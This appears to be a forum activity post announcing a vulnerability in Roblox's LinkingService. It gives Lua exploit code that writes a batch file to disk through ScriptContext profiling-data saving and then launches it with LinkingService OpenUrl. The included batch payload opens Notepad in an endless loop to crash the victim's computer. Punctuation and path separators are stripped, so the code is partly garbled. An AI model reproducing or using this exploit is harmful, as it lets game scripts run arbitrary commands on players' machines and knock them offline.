Activity Feed
Created a new thread : LinkingService: Vulnerable
Block LinkingService
And might AvatarEditorService
local LinkingService = gameGetService(LinkingService)
local ScriptContext = gameGetService(ScriptContext)
local scriptContent = [[]]
local payload = ScriptContextSaveScriptProfilingData(scriptContent, ........test.bat)
LinkingServiceOpenUrl(payload)
here is an example that opens notepads repeatedly and crashes your pc
local LinkingService = gameGetService(LinkingService)
local ScriptContext = gameGetService(ScriptContext)
local scriptContent = [[@echo off
top
START %SystemRoot%system32notepad.exe
GOTO top
]]
local payload = ScriptContextSaveScriptProfilingData(scriptContent, ........test.bat)
LinkingServiceOpenUrl(payload)